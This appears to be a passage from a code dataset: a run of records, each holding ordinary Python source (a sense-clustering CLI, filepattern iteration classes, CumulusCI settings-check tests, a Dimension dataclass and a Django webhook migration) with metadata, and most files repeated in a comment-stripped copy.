            # Remote call failed; can't determine anything.
            return None
        if node:
            # Object is rendered in the buffer, so not inside an application.
            return False
        return None

    # Gesture bindings for this tree interceptor's scripts.
    __gestures = {
        "kb:NVDA+f5": "refreshBuffer",
        "kb:NVDA+v": "toggleScreenLayout",
    }
| true | true |
f718f706894e02a8cb3427d1bb25139c6ae58378 | 7,286 | py | Python | man_clus.py | frankier/finn-sense-clust | 9b76ee3bdacc9b039432674306650c6edb9da3bb | [
"Apache-2.0"
] | null | null | null | man_clus.py | frankier/finn-sense-clust | 9b76ee3bdacc9b039432674306650c6edb9da3bb | [
"Apache-2.0"
] | 2 | 2019-04-27T14:40:10.000Z | 2019-08-21T15:43:19.000Z | man_clus.py | frankier/finn-sense-clust | 9b76ee3bdacc9b039432674306650c6edb9da3bb | [
"Apache-2.0"
] | null | null | null | from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
    """Utilities for manual sense clustering."""
    pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
    """
    Generate unclustered words in OUT_DIR from word list WORDS
    """
    session = get_session()
    for word in words:
        # Input lines look like "lemma.Noun # comment"; keep only "lemma.Noun".
        word_pos = word.split("#")[0].strip()
        word, pos = word_pos.split(".")
        assert pos == "Noun"
        with open(pjoin(out_dir, word_pos), "w") as outf:
            # Get Wiktionary results
            results = session.execute(select([
                word_sense.c.sense_id,
                word_sense.c.etymology_index,
                word_sense.c.sense,
                word_sense.c.extra,
            ]).select_from(joined).where(
                (headword.c.name == word) &
                (word_sense.c.pos == "Noun")
            ).order_by(word_sense.c.etymology_index)).fetchall()
            prev_ety = None
            for row in results:
                # A blank line separates etymologies (initial sense groups).
                if prev_ety is not None and row["etymology_index"] != prev_ety:
                    outf.write("\n")
                outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
                prev_ety = row["etymology_index"]
            # Get WordNet results
            for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
                wordnets = {wn for wn, _ in lemma_objs}
                outf.write("\n")
                outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
    """
    Add table of frequencies to DB
    """
    session = get_session()
    # NOTE(review): session is called here (session()) but used directly below
    # and in the other commands — presumably get_session returns a factory-like
    # object that is also usable as a session; confirm against wikiparse.utils.db.
    metadata.create_all(session().get_bind().engine)
    with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
        for name, freq in name_freqs:
            insert(session, freqs, name=name, freq=freq)
    session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
    """
    Compile manually clustered words in files INFS to OUT as a gold csv ready
    for use by eval
    """
    out.write("manann,ref\n")
    for path in infs:
        # The file name (e.g. "sana.Noun") encodes the lemma before the dot.
        lemma = basename(path).split(".")[0]
        group = 1
        with open(path) as handle:
            for line in handle:
                if not line.strip():
                    # A blank line starts a new sense group.
                    group += 1
                    continue
                # Everything before "#" on the line is the sense reference.
                ref = line.split("#")[0].strip()
                out.write(f"{lemma}.{group:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
    """
    Expand a gold clustering CSV INF back into per-lemma files in OUT_DIR,
    annotating each sense reference with its tokenized definition.
    """
    session = get_session()
    for lemma, grouping in gen_groupings(inf):
        with open(pjoin(out_dir, lemma), "w") as outf:
            first = True
            for group_num, synsets in grouping.items():
                # Blank line between groups, matching the manual-annotation format.
                if not first:
                    outf.write("\n")
                else:
                    first = False
                for synset in synsets:
                    outf.write(synset)
                    outf.write(" # ")
                    if is_wn_ref(synset):
                        # WordNet reference: look up the definition via NLTK.
                        sense = wordnet.of2ss(synset).definition()
                    else:
                        # Wiktionary sense id: fetch the sense text from the DB.
                        sense = session.execute(select([
                            word_sense.c.sense,
                        ]).select_from(joined).where(
                            (headword.c.name == lemma) &
                            (word_sense.c.sense_id == synset)
                        )).fetchone()["sense"]
                    tokens = word_tokenize(sense)
                    outf.write(" ".join(tokens))
                    outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):  # NOTE: shadows the builtin filter(); kept because click derives the CLI name from it
    """
    Filter a gold CSV to filter non-WordNet rows
    """
    assert inf.readline().strip() == "manann,ref"
    outf.write("manann,ref\n")
    if filter in ("wn", "wiki"):
        # Keep only WordNet refs (wn) or only Wiktionary refs (wiki).
        for line in inf:
            manann, ref = line.strip().split(",")
            if ((filter == "wn") and not is_wn_ref(ref)) or \
                    ((filter == "wiki") and is_wn_ref(ref)):
                continue
            outf.write(line)
    else:
        # "link" mode: pair WordNet and Wiktionary refs of the same lemma.
        groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
        for lemma, group in groups:
            wn_grp = []
            wiki_grp = []
            for tpl in group:
                if is_wn_ref(tpl[2]):
                    wn_grp.append(tpl)
                else:
                    wiki_grp.append(tpl)
            grp_idx = 1
            # NOTE(review): each wn x wiki pair is emitted as its own group pair —
            # same group suffix when the original frames match, distinct suffixes
            # otherwise; confirm this matches the intended linking semantics.
            for _, f1, lid1 in wn_grp:
                for _, f2, lid2 in wiki_grp:
                    if f1 == f2:
                        outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
                        outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
                    else:
                        outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
                        outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
                    grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
    """
    Pick etymologically ambigious nouns for creating manual clustering.
    """
    # Non-inflected nouns with more than one distinct etymology, ordered by
    # descending corpus frequency.
    query = select([
        headword.c.name,
        freqs.c.freq,
    ]).select_from(joined_freq).where(
        word_sense.c.etymology_index.isnot(None) &
        (word_sense.c.pos == "Noun") &
        word_sense.c.inflection_of_id.is_(None)
    ).group_by(
        headword.c.id
    ).having(
        count(
            distinct(word_sense.c.etymology_index)
        ) > 1
    ).order_by(freqs.c.freq.desc()).limit(limit)
    session = get_session()
    candidates = session.execute(query).fetchall()
    for word, freq in candidates:
        print(word + ".Noun", "#", freq)
    if verbose:
        # Additionally dump every sense of each candidate for inspection.
        print("\n")
        for word, _ in candidates:
            print("#", word)
            pprint(session.execute(select([
                word_sense.c.sense_id,
                word_sense.c.sense,
            ]).select_from(joined).where(
                headword.c.name == word
            )).fetchall())


if __name__ == "__main__":
    man_clus()
| 35.198068 | 131 | 0.549684 | from pprint import pprint
import click
from senseclust.queries import joined, joined_freq
from wikiparse.tables import headword, word_sense
from sqlalchemy.sql import distinct, select
from sqlalchemy.sql.functions import count
from os.path import join as pjoin
from senseclust.wordnet import get_lemma_objs, WORDNETS
from stiff.writers import annotation_comment
from finntk.wordnet.utils import pre_id_to_post
from wikiparse.utils.db import get_session, insert
import wordfreq
from senseclust.tables import metadata, freqs
from senseclust.groupings import gen_groupings
from senseclust.utils.clust import split_line, is_wn_ref
from os.path import basename
import itertools
from nltk.tokenize import word_tokenize
from nltk.corpus import wordnet
@click.group()
def man_clus():
pass
@man_clus.command()
@click.argument("words", type=click.File('r'))
@click.argument("out_dir")
def gen(words, out_dir):
session = get_session()
for word in words:
word_pos = word.split("#")[0].strip()
word, pos = word_pos.split(".")
assert pos == "Noun"
with open(pjoin(out_dir, word_pos), "w") as outf:
results = session.execute(select([
word_sense.c.sense_id,
word_sense.c.etymology_index,
word_sense.c.sense,
word_sense.c.extra,
]).select_from(joined).where(
(headword.c.name == word) &
(word_sense.c.pos == "Noun")
).order_by(word_sense.c.etymology_index)).fetchall()
prev_ety = None
for row in results:
if prev_ety is not None and row["etymology_index"] != prev_ety:
outf.write("\n")
outf.write("{} # {}\n".format(row["sense_id"], row["extra"]["raw_defn"].strip().replace("\n", " --- ")))
prev_ety = row["etymology_index"]
for synset_id, lemma_objs in get_lemma_objs(word, WORDNETS, "n").items():
wordnets = {wn for wn, _ in lemma_objs}
outf.write("\n")
outf.write("{} # [{}] {}\n".format(pre_id_to_post(synset_id), ", ".join(wordnets), annotation_comment(lemma_objs)))
@man_clus.command()
def add_freq_data():
session = get_session()
metadata.create_all(session().get_bind().engine)
with click.progressbar(wordfreq.get_frequency_dict("fi").items(), label="Inserting frequencies") as name_freqs:
for name, freq in name_freqs:
insert(session, freqs, name=name, freq=freq)
session.commit()
@man_clus.command()
@click.argument("infs", nargs=-1)
@click.argument("out", type=click.File('w'))
def compile(infs, out):
out.write("manann,ref\n")
for inf in infs:
word_pos = basename(inf)
word = word_pos.split(".")[0]
idx = 1
with open(inf) as f:
for line in f:
if not line.strip():
idx += 1
else:
ref = line.split("#")[0].strip()
out.write(f"{word}.{idx:02d},{ref}\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("out_dir")
def decompile(inf, out_dir):
session = get_session()
for lemma, grouping in gen_groupings(inf):
with open(pjoin(out_dir, lemma), "w") as outf:
first = True
for group_num, synsets in grouping.items():
if not first:
outf.write("\n")
else:
first = False
for synset in synsets:
outf.write(synset)
outf.write(" # ")
if is_wn_ref(synset):
sense = wordnet.of2ss(synset).definition()
else:
sense = session.execute(select([
word_sense.c.sense,
]).select_from(joined).where(
(headword.c.name == lemma) &
(word_sense.c.sense_id == synset)
)).fetchone()["sense"]
tokens = word_tokenize(sense)
outf.write(" ".join(tokens))
outf.write("\n")
@man_clus.command()
@click.argument("inf", type=click.File('r'))
@click.argument("outf", type=click.File('w'))
@click.option('--filter', type=click.Choice(['wn', 'wiki', 'link']))
def filter(inf, outf, filter):
assert inf.readline().strip() == "manann,ref"
outf.write("manann,ref\n")
if filter in ("wn", "wiki"):
for line in inf:
manann, ref = line.strip().split(",")
if ((filter == "wn") and not is_wn_ref(ref)) or \
((filter == "wiki") and is_wn_ref(ref)):
continue
outf.write(line)
else:
groups = itertools.groupby((split_line(line) for line in inf), lambda tpl: tpl[0])
for lemma, group in groups:
wn_grp = []
wiki_grp = []
for tpl in group:
if is_wn_ref(tpl[2]):
wn_grp.append(tpl)
else:
wiki_grp.append(tpl)
grp_idx = 1
for _, f1, lid1 in wn_grp:
for _, f2, lid2 in wiki_grp:
if f1 == f2:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid2}\n")
else:
outf.write(f"{lemma}.{grp_idx:02d}.01,{lid1}\n")
outf.write(f"{lemma}.{grp_idx:02d}.02,{lid2}\n")
grp_idx += 1
@man_clus.command()
@click.argument("limit", required=False, type=int)
@click.option("--verbose/--no-verbose")
def pick_words(limit=50, verbose=False):
query = select([
headword.c.name,
freqs.c.freq,
]).select_from(joined_freq).where(
word_sense.c.etymology_index.isnot(None) &
(word_sense.c.pos == "Noun") &
word_sense.c.inflection_of_id.is_(None)
).group_by(
headword.c.id
).having(
count(
distinct(word_sense.c.etymology_index)
) > 1
).order_by(freqs.c.freq.desc()).limit(limit)
session = get_session()
candidates = session.execute(query).fetchall()
for word, freq in candidates:
print(word + ".Noun", "#", freq)
if verbose:
print("\n")
for word, _ in candidates:
print("#", word)
pprint(session.execute(select([
word_sense.c.sense_id,
word_sense.c.sense,
]).select_from(joined).where(
headword.c.name == word
)).fetchall())
if __name__ == "__main__":
man_clus()
| true | true |
f718f70961bab8dab9071693156e930da601e4b4 | 10,851 | py | Python | utils/polus-filepattern-util/filepattern/classes.py | Vishakha6/polus-plugins | ff6a31d5a6b78a26378745719f19d3e724e25670 | [
"MIT"
] | 1 | 2021-07-23T20:46:18.000Z | 2021-07-23T20:46:18.000Z | utils/polus-filepattern-util/filepattern/classes.py | Vishakha6/polus-plugins | ff6a31d5a6b78a26378745719f19d3e724e25670 | [
"MIT"
] | 2 | 2021-07-13T16:20:31.000Z | 2021-08-20T11:21:34.000Z | utils/polus-filepattern-util/filepattern/classes.py | gauharbains/polus-plugins | 5e4d1e33bb61d7619d3a76fb7c115d475628a909 | [
"MIT"
] | 3 | 2021-08-04T15:45:53.000Z | 2022-03-09T19:03:57.000Z | import copy, pathlib, typing, abc
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
""" Abstract base class for handling filepatterns
Most of the functions in filepattern return complicated variable
structures that might be difficult to use in an abstract way. This class
provides tools to streamline usage of the filepattern functions. In
particular, the iterate function is an iterable that permits simple
iteration over filenames with specific values and grouped by any variable.
"""
    def __init__(self,
                 file_path: typing.Union[pathlib.Path, str],
                 pattern: str,
                 var_order: str = "rtczyxp"):
        """Initialize a Pattern object

        Args:
            file_path: Path to directory or file to parse
            pattern: A filepattern string
            var_order: Defines the dictionary nesting order. The list of
                characters is limited to :any:`VARIABLES`. *Defaults to
                "rtczyxp".*
        """
        self.files = {}
        self.uniques = {}
        # Define iteration variables
        self._kwargs = None
        self._group_by = None
        self.pattern = pattern
        self.regex, self.variables = get_regex(pattern)
        self.path = file_path
        self.var_order = var_order
        # Restrict the nesting order to variables actually present in the pattern.
        self.var_order = "".join([v for v in self.var_order if v in self.variables])
        # parse_data is implemented by subclasses (e.g. directory vs vector parsing).
        self.files, self.uniques = self.parse_data(file_path)
def __call__(self,group_by: list = [],**kwargs) -> typing.Iterable[typing.List[dict]]:
"""Iterate through files parsed using a filepattern
This function is an iterable. On each call, it returns a list of
filenames that matches a set of variable values. It iterates through
every combination of variable values.
Variables designated in the group_by input argument are grouped
together. So, if ``group_by="zc"``, then each iteration will return all
filenames that have constant values for each variable except z and c.
In addition to the group_by variable, specific variable arguments can
also be included as with the :any:`get_matching` function.
Args:
group_by: String of variables by which the output filenames will be
grouped
**kwargs: Each keyword argument must be a valid uppercase letter
from :any:`VARIABLES`. The value can be one integer or a list of
integers.
Returns:
Iterable that returns a list of files with matching variables
"""
self._group_by = group_by
self._kwargs = kwargs
return self
@abc.abstractmethod
def parse_data(self,file_path: str) -> dict:
"""Parse data in a directory
This is where all the logic for the parsing the data should live. It
must return a nested dictionary in the same format as
:any:`parse_directory`.
Args:
file_path: Path to target file directory to parse
Returns:
A nested dictionary of file dictionaries
"""
def output_name(self,files:typing.List[dict] = []) -> str:
"""Determine an output name for a list of files
See the :any:`output_name` method for more details.
This method uses the ``filepattern`` used to initialize the object to
determine an output file name that summarizes the range of variables
included in the ``file_path`` list of dictionaries. If ``file_path`` is
empty, this method returns an output file name that summarizes the range
of all variables parsed by the object.
Args:
files: A list of file dictionaries
Returns:
An output file name
"""
if len(files) == 0:
files = self.files
files = get_matching(files,self.var_order,**{k.upper():v for k,v in self.uniques.items()})
vals = {v:set() for v in self.var_order}
for file in files:
for k,v in file.items():
if k not in self.var_order:
continue
vals[k].add(v)
kwargs = {}
for k,v in vals.items():
v = list(v)
if len(v) == 1 and v[0] != -1:
kwargs[k] = v[0]
return output_name(self.pattern,files,kwargs)
# Get filenames matching values for specified variables
def get_matching(self,**kwargs):
""" Get all filenames matching specific values
This function runs the get_matching function using the objects file
dictionary. For more information, see :any:`get_matching`.
Args:
**kwargs: One of :any:`VARIABLES`, must be uppercase, can be single
values or a list of values
Returns:
A list of all files matching the input values
"""
# get matching files
files = get_matching(self.files,self.var_order,out_var=None,**kwargs)
return files
def __iter__(self):
group_by = self._group_by
kwargs = self._kwargs
self._group_by = None
self._kwargs = None
if kwargs == None:
kwargs = {}
if group_by == None:
group_by = ''
# If self.files is a list, no parsing took place so just loop through the files
if isinstance(self.files,list):
for f in self.files:
yield [f]
return
# Generate the values to iterate through
iter_vars = {}
for v in self.var_order:
# Proceed to the next variable if v is not a grouping variable
if v in group_by:
continue
# Check to see if the current variable has a matching value
elif v.upper() in kwargs.keys():
# If the value is a list, then we copy the list since we modify
# it later
if isinstance(kwargs[v.upper()],list):
iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
# If the value is not a list, turn it into a list for consistent
# access when looping over values
else:
iter_vars[v] = [kwargs[v.upper()]]
# If the variable is neither in group_by or kwargs, just copy the
# dictionary or list since it gets modified later
else:
iter_vars[v] = copy.deepcopy(self.uniques[v])
# Find the shallowest variable in the dictionary structure
# Shallowest means the variable containing the list of file dictionaries
shallowest = None
for v in iter_vars.keys():
# -1 indicates the variable doesn't exist in the file names
if -1 in iter_vars[v] and len(iter_vars[v]):
continue
else:
shallowest = v
break
# If shallowest is undefined, return all file names since no variables
# were found in any of the file names
if shallowest == None:
yield get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
return
# Loop through every combination of files
while len(iter_vars[shallowest])>0:
# Get list of filenames and return as iterator
iter_files = []
iter_files = get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
if len(iter_files)>0:
yield iter_files
# Delete last iteration indices
for v in reversed(self.var_order):
if v in group_by:
continue
del iter_vars[v][0]
if len(iter_vars[v])>0:
break
elif v == shallowest:
break
iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
    """ Main class for handling filename patterns

    Most of the functions in filepattern.py return complicated variable
    structures that might be difficult to use in an abstract way. This class
    provides tools to use the above functions in a simpler way. In particular,
    the iterate function is an iterable that permits simple iteration over
    filenames with specific values and grouped by any desired variable.
    """

    def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
        """Parse data in a directory

        Concrete implementation of :any:`PatternObject.parse_data` that
        delegates to :any:`parse_directory`, using the regex and variables
        derived from the filepattern given at construction time.

        Args:
            file_path: Path to target file directory to parse

        Returns:
            A nested dictionary of file dictionaries
        """
        return parse_directory(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
class VectorPattern(PatternObject):
    """ Main class for handling stitching vectors

    This class works nearly identically to :any:`FilePattern`, except it works
    with lines inside of a stitching vector. As with FilePattern, the iterate
    method will iterate through values, which in the case of VectorPattern are
    parsed lines of a stitching vector.

    Note:
        One major difference between this class and :any:`FilePattern` is that
        the ``file`` values in the file dictionaries contain strings rather than
        ``pathlib.Path`` objects.
    """

    def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
        """Parse data in a stitching vector

        Concrete implementation of :any:`PatternObject.parse_data` that
        delegates to :any:`parse_vector`, using the regex and variables
        derived from the filepattern given at construction time.

        Args:
            file_path: Path to target stitching vector to parse

        Returns:
            A nested dictionary of file dictionaries
        """
        return parse_vector(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
def __init__(self,
file_path: typing.Union[pathlib.Path,str],
pattern: str,
var_order: str = "rtczyxp"):
self.files = {}
self.uniques = {}
self._kwargs = None
self._group_by = None
self.pattern = pattern
self.regex, self.variables = get_regex(pattern)
self.path = file_path
self.var_order = var_order
self.var_order = "".join([v for v in self.var_order if v in self.variables])
self.files, self.uniques = self.parse_data(file_path)
def __call__(self,group_by: list = [],**kwargs) -> typing.Iterable[typing.List[dict]]:
self._group_by = group_by
self._kwargs = kwargs
return self
@abc.abstractmethod
def parse_data(self,file_path: str) -> dict:
def output_name(self,files:typing.List[dict] = []) -> str:
if len(files) == 0:
files = self.files
files = get_matching(files,self.var_order,**{k.upper():v for k,v in self.uniques.items()})
vals = {v:set() for v in self.var_order}
for file in files:
for k,v in file.items():
if k not in self.var_order:
continue
vals[k].add(v)
kwargs = {}
for k,v in vals.items():
v = list(v)
if len(v) == 1 and v[0] != -1:
kwargs[k] = v[0]
return output_name(self.pattern,files,kwargs)
def get_matching(self,**kwargs):
files = get_matching(self.files,self.var_order,out_var=None,**kwargs)
return files
def __iter__(self):
group_by = self._group_by
kwargs = self._kwargs
self._group_by = None
self._kwargs = None
if kwargs == None:
kwargs = {}
if group_by == None:
group_by = ''
if isinstance(self.files,list):
for f in self.files:
yield [f]
return
iter_vars = {}
for v in self.var_order:
if v in group_by:
continue
elif v.upper() in kwargs.keys():
if isinstance(kwargs[v.upper()],list):
iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
else:
iter_vars[v] = [kwargs[v.upper()]]
else:
iter_vars[v] = copy.deepcopy(self.uniques[v])
shallowest = None
for v in iter_vars.keys():
if -1 in iter_vars[v] and len(iter_vars[v]):
continue
else:
shallowest = v
break
# If shallowest is undefined, return all file names since no variables
# were found in any of the file names
if shallowest == None:
yield get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
return
# Loop through every combination of files
while len(iter_vars[shallowest])>0:
# Get list of filenames and return as iterator
iter_files = []
iter_files = get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
if len(iter_files)>0:
yield iter_files
# Delete last iteration indices
for v in reversed(self.var_order):
if v in group_by:
continue
del iter_vars[v][0]
if len(iter_vars[v])>0:
break
elif v == shallowest:
break
iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
return parse_directory(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
class VectorPattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]):
return parse_vector(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order) | true | true |
f718f7738c7e7e56290c2c143c5634263a7cef6f | 2,697 | py | Python | cumulusci/tasks/preflight/tests/test_settings.py | atrancandoris/CumulusCI | cc468ea315af2dd8c11b67f9316af65530d0f4bc | [
"BSD-3-Clause"
] | 1 | 2020-12-04T10:29:31.000Z | 2020-12-04T10:29:31.000Z | cumulusci/tasks/preflight/tests/test_settings.py | ThierryFeltin/CumulusCI | 80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14 | [
"BSD-3-Clause"
] | null | null | null | cumulusci/tasks/preflight/tests/test_settings.py | ThierryFeltin/CumulusCI | 80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14 | [
"BSD-3-Clause"
] | null | null | null | from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
# Canned Tooling API query response used by the mocked HTTP layer below;
# one record exposing each settings-field type the tests exercise.
JSON_RESPONSE = {
    "records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
    "done": True,
    "totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
    "settings_field,value,outcome",
    [
        ("IntVal", 3, True),
        ("FloatVal", 3.0, True),
        ("BoolVal", "true", True),
        ("StringVal", "foo", True),
        ("StringVal", "bad", False),
    ],
)
def test_check_settings(settings_field, value, outcome):
    """The task returns True iff the queried field equals the expected value.

    Covers int, float, bool (string-typed input) and string comparisons,
    plus one mismatching string case.
    """
    responses.add(
        "GET",
        f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
        json=JSON_RESPONSE,
    )
    task = create_task(
        CheckSettingsValue,
        {
            "settings_type": "ChatterSettings",
            "settings_field": settings_field,
            "value": value,
        },
    )
    task()
    assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
    """An empty query result (no settings records) yields False."""
    responses.add(
        "GET",
        "https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
        json={"records": []},
    )
    task = create_task(
        CheckSettingsValue,
        {
            "settings_type": "ChatterSettings",
            "settings_field": "Foo",
            "value": True,
        },
    )
    task()
    assert task.return_values is False
@responses.activate
def test_check_settings__failure():
    """A failed (HTTP 400) query is treated as False when
    treat_missing_as_failure is set, instead of raising."""
    responses.add(
        "GET",
        status=400,
        url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
        json={},
    )
    task = create_task(
        CheckSettingsValue,
        {
            "settings_type": "NoSettings",
            "settings_field": "Test",
            "value": True,
            "treat_missing_as_failure": True,
        },
    )
    task()
    assert task.return_values is False
@responses.activate
def test_check_settings__exception():
    """Without treat_missing_as_failure, a failed (HTTP 400) query
    propagates SalesforceMalformedRequest to the caller."""
    responses.add(
        "GET",
        status=400,
        url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
        json={},
    )
    task = create_task(
        CheckSettingsValue,
        {
            "settings_type": "NoSettings",
            "settings_field": "Test",
            "value": True,
        },
    )
    with pytest.raises(SalesforceMalformedRequest):
        task()
    assert task.return_values is False
| 23.867257 | 121 | 0.599184 | from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
JSON_RESPONSE = {
"records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
"done": True,
"totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
"settings_field,value,outcome",
[
("IntVal", 3, True),
("FloatVal", 3.0, True),
("BoolVal", "true", True),
("StringVal", "foo", True),
("StringVal", "bad", False),
],
)
def test_check_settings(settings_field, value, outcome):
responses.add(
"GET",
f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
json=JSON_RESPONSE,
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": settings_field,
"value": value,
},
)
task()
assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
responses.add(
"GET",
"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
json={"records": []},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": "Foo",
"value": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__failure():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
"treat_missing_as_failure": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__exception():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
},
)
with pytest.raises(SalesforceMalformedRequest):
task()
assert task.return_values is False
| true | true |
f718f9f194730e615e7ec9ce3e7cb3a576ea5bd8 | 264 | py | Python | text/_cascade/_typing/_dimension.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | text/_cascade/_typing/_dimension.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | text/_cascade/_typing/_dimension.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | """
Dimension
"""
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| 12 | 33 | 0.734848 |
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| true | true |
f718fa636465cb39461b7969d2924c94c71ba30c | 814 | py | Python | payment/migrations/0012_webhookevent.py | botent/django-stripe-paypal | 3a768a6c45913513197f4f6b7044223ae96db716 | [
"MIT"
] | 3 | 2021-07-29T16:27:49.000Z | 2021-11-12T15:39:42.000Z | payment/migrations/0012_webhookevent.py | botent/django-stripe-paypal | 3a768a6c45913513197f4f6b7044223ae96db716 | [
"MIT"
] | null | null | null | payment/migrations/0012_webhookevent.py | botent/django-stripe-paypal | 3a768a6c45913513197f4f6b7044223ae96db716 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-09-21 12:01
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: creates the WebhookEvent table, which stores
    # incoming payment-provider webhook payloads (customer, event type, the
    # event's data object and the full raw event JSON).

    dependencies = [
        ('payment', '0011_alter_paymentorder_name'),
    ]

    operations = [
        migrations.CreateModel(
            name='WebhookEvent',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
                ('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
                ('data_obj', models.JSONField(verbose_name='Data Object')),
                ('event_info', models.JSONField(verbose_name='Full Event Data')),
            ],
        ),
    ]
| 33.916667 | 117 | 0.608108 |
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payment', '0011_alter_paymentorder_name'),
]
operations = [
migrations.CreateModel(
name='WebhookEvent',
fields=[
